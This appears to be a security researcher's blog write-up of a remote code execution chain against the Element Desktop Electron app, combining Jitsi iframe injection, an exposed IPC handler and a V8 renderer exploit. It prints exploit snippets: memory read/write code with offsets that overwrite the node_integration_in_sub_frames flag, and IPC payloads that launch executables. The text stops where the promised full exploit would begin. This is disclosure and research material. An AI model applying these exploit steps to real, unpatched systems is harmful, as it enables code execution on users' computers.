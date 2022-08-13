We achieved full RCE on Element Desktop by chaining iframe injection, Electron misconfigs, and a V8 exploit to bypass sandboxing and access Node.js APIs from a subframe.

Note Want to secure your Electron or JavaScript application? Reach out to us at hello@hacktron.ai or visit https://hacktron.ai to learn more.

Introduction

During our Electron Desktop Application hacking frenzy, Pew informed me on Discord about a Desktop Application called Element in which he was able to insert an external iframe. We began examining the Element source code, which is public here, and eventually succeeded in Remote Code Execution.

Let’s dig into the details of the bug right away!

Bug 1: iframe injection

This is a feature, rather than a bug. Element supports Jitsi for conference calls, which provides options for self-hosting your own server. According to its documentation, the conferenceDomain query parameter can be provided to embed a self-hosting conference server. Furthermore, the documentation also mentions that “The URL is typically something we shove into an iframe with ‘sandboxing’”. Since it was “sandboxed” it won’t be an issue right… right?

Here is the PoC for the web application. The following URL can be used to embed an external site named pwn.af:

Here is the desktop application PoC:

By using the above PoC, we can get JavaScript execution on the desktop app. The issue, however, is that the Element Desktop application fully enables sandboxing. As you can notice in the below script, sandboxing is enabled via app.enableSandbox() . Also note that nodeIntegrationInSubFrames is disabled by default:

1 app . enableSandbox (); 2 global . mainWindow = new BrowserWindow ({ 3 [ ... ] 4 webPreferences : { 5 preload : preloadScript, 6 nodeIntegration : false , 7 //sandbox: true, // We enable sandboxing from app.enableSandbox() above 8 contextIsolation : true , 9 webgl : true , 10 },

This situation is different from the previous Discord bug where sandboxing was not fully enabled.

There are a few things we can look for if sandboxing is disabled on the main window:

Check if there are any new-window or navigation misconfigurations similar to the Discord bug. Check if there are any postMessage issues on the main frame. Find an XSS on the subdomain of the parent window (app.element.io) to perform same-origin spoofing (similar to this challenge I gave in BSides Ahmedabad CTF). Finally, we can look for sensitive ipcMain handlers on the main window, which can be reached through CVE-2022-29247 (which we reported to Electron).

Now, the only option we have is option 4, as the app is fully sandboxed. To achieve RCE, we will need to utilize the following.

Bug 2: Finding RCE sinks on the desktop app

After grepping for ipcMain.on and ipcMain.handle , we came across an interesting IPC handler defined to open user-downloaded files, located here:

src/webcontents-handler.ts 248 ipcMain . on ( 'userDownloadOpen' , function (ev : IpcMainEvent , { path }) { 249 shell . openPath (path); 250 });

And, this is exposed to the main window’s parent frame using the preload script’s contextBridge as below:

1 contextBridge . exposeInMainWorld ( 2 "electron" , 3 { 4 on (channel : string , listener : (event : IpcRendererEvent , ... args : any []) => void ) : void { 5 if ( ! CHANNELS . includes (channel)) { 6 console . error ( `Unknown IPC channel ${ channel } ignored` ); 7 return ; 8 } 9 ipcRenderer . on (channel, listener); 10 }, 11 send (channel : string , ... args : any []) : void { 12 if ( ! CHANNELS . includes (channel)) { 13 console . error ( `Unknown IPC channel ${ channel } ignored` ); 14 return ; 15 } 16 ipcRenderer . send (channel, ... args); 17 }, 18 }, 19 );

So, by sending the following IPC from the main frame, we achieve RCE:

1 electron . send ( 'userDownloadOpen' , { path : 'C: \\ Windows \\ System32 \\ calc.exe' })

Now, let’s consider our options on how to get access to electron.send from the iframe which we have XSS on.

Get an XSS on the main window and access electron . send directly. Use CVE-2022-29247’s nodeIntegrationInSubFrames and get access to electron . send in our iframe.

We audited the main window’s JavaScript for XSS sinks, but we couldn’t find anything interesting. So, we decided to use the second option, which seems to be easily achieved as the Element Desktop is using an old version of Electron ( Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Element/1.9.5 Chrome/91.0.4472.164 Electron/13.5.1 Safari/537.36 ).

What is nodeIntegrationInSubFrames?

It is important to understand what nodeIntegrationSubFrames is clearly, from the official Electron Documentation the nodeIntegrationInSubFrames webPreference is defined as follows:

nodeIntegrationInSubFrames : Experimental option for enabling Node.js support in sub-frames such as iframes and child windows. All your preloads will load for every iframe, you can use process.isMainFrame to determine if you are in the main frame or not.

The important thing to note in the above statement for our exploit is that the nodeIntegrationSubFrames enables preloads in iframes, in other words it exposes contextBridge APIs to the iframes and child windows. Which is what we exactly wanted to get access to electron.send exposed by the Element Desktop Main window preload JS.

The situation we have can be described with the below picture:

As you can see our frame doesn’t have access to electron.send API.

Bug 3: Renderer exploit to enable nodeIntegrationInSubFrames (CVE-2022-29247)

Electron adds Electron-specific WebPreferences such as node_integration , context_isolation and node_integration_in_subframes by patching the blink WebPreferences . These preferences are then later used to check if the specific RenderFrame (a web frame) has access to Electron specific features, such as Node APIs, preload scripts, contextBridge , etc.

1 --- a/third_party/blink/common/web_preferences/web_preferences.cc 2 +++ b/third_party/blink/common/web_preferences/web_preferences.cc 3 @@ -142,6 +142,19 @@ WebPreferences::WebPreferences() 4 fake_no_alloc_direct_call_for_testing_enabled(false), 5 v8_cache_options(blink::mojom::V8CacheOptions::kDefault), 6 record_whole_document(false), 7 + // Begin Electron-specific WebPreferences. 8 + context_isolation(false), 9 + is_webview(false), 10 + hidden_page(false), 11 + offscreen(false), 12 + node_integration(false), 13 + node_integration_in_worker(false), 14 + node_integration_in_sub_frames(false), 15 + enable_spellcheck(false), 16 + enable_plugins(false), 17 + enable_websql(false), 18 + webview_tag(false), 19 + // End Electron-specific WebPreferences. 20 cookie_enabled(true), 21 accelerated_video_decode_enabled(false), 22 animation_policy(

Let’s just concentrate on node_integration_in_sub_frames , which is needed for our Element RCE. The other WebPreferences exploitations will be described in coming blog posts.

The decision to either allow preloads in child frames ( RenderFrame s) takes place in ElectronRenderFrameObserver:DidInstallConditionalFeatures , which is done in the same renderer process instead of the browser process:

1 void ElectronSandboxedRendererClient :: DidCreateScriptContext ( 2 v8 :: Handle < v8 :: Context > context, 3 content :: RenderFrame * render_frame) { 4 RendererClientBase :: DidCreateScriptContext (context, render_frame); 5 6 // Only allow preload for the main frame or 7 // For devtools we still want to run the preload_bundle script 8 // Or when nodeSupport is explicitly enabled in sub frames 9 bool is_main_frame = render_frame -> IsMainFrame (); 10 bool is_devtools = 11 IsDevTools (render_frame) || IsDevToolsExtension (render_frame); 12 bool allow_node_in_sub_frames = 13 render_frame -> GetBlinkPreferences () . node_integration_in_sub_frames; 14 bool should_load_preload = 15 (is_main_frame || is_devtools || allow_node_in_sub_frames) && 16 ! IsWebViewFrame (context, render_frame); 17 if ( ! should_load_preload) 18 return ; 19 20 injected_frames_ . insert (render_frame); 21 // ... 22 }

As the check is done in the renderer process, using a renderer exploit the setting can be flipped which effectively enables nodeIntegrationInSubFrames .

The only thing which is left is to write an exploit which flips the render_frame->GetBlinkPreferences().node_integration_in_sub_frames somehow, which is the hardest part for me.

Using a v8 exploit (CVE-2021-37975)

I decided to use CVE-2021-37975 to exploit the issue. Having not so much experience in exploit development, this was the most tiring yet most interesting part for me. Fun fact, I didn’t know nothing about v8 binary exploitation before our research, and somehow was able to learn basic v8 exploitation thanks to my CTF mate ptr-yudai 😌. Even though we usually use a public v8 exploit, it’s not as easy as running it and popping the calculator. The hardest part I faced during the exploit writing was finding the render_frame_ offset from the window object, as it was usually not stable because of naive usage of hardcoded offsets. I spent days in lldb to understand the v8 bug and find offsets to blink WebPreferences , but popping the calculator in the end made it worth doing.

Anywho, after trying for 2 days I was able to pull off a full exploit. The following snippet reveals the offset to render_frame->GetBlinkPreferences().node_integration_in_sub_frames . You can find the full exploit at the end of the writeup:

1 var win = addrof (window) 2 console . log ( '[+] win address : ' + win . hex ()) 3 4 var addr1 = half_read (win + 0x18 n ) 5 console . log ( '[+] win + 0x18 : ' + addr1 . hex ()) 6 7 var addr2 = full_read (addr1 + 0xf8 n ) 8 console . log ( '[+] add2: ' + addr2 . hex ()) 9 10 var web_pref = addr2 + 0x50008 n 11 var preload = full_read (web_pref + 0x1a0 n ) 12 console . log ( '[+] web_pref addr: ' + web_pref . hex ()) 13 14 var nisf = web_pref + 0x1ac n 15 var nisf_val = full_read (nisf) 16 console . log ( '[+] nisf val = ' + nisf_val . hex ()) 17 var overwrite = nisf_val | 0x0000000000000001 n //overwrite 18 full_write (nisf, overwrite) 19 var nisf_val = full_read (nisf) 20 console . log ( '[+] nisf val overwritten = ' + nisf_val . hex ())

And finally, after enabling nodeIntegrationInSubFrames , we just need to create a same-origin RenderFrame , which will have access to electron.send 🔥:

1 frame = document . createElement ( 'iframe' ) 2 frame . srcdoc = 3 "<script>electron.send('userDownloadOpen',{path:'/System/Applications/Calculator.app/Contents/MacOS/Calculator'})< \/ script>" 4 document . body . appendChild (frame)

PoC

We can diagram the final exploit as follows:

Here is a video of the exploit in action:

Here is the full exploit: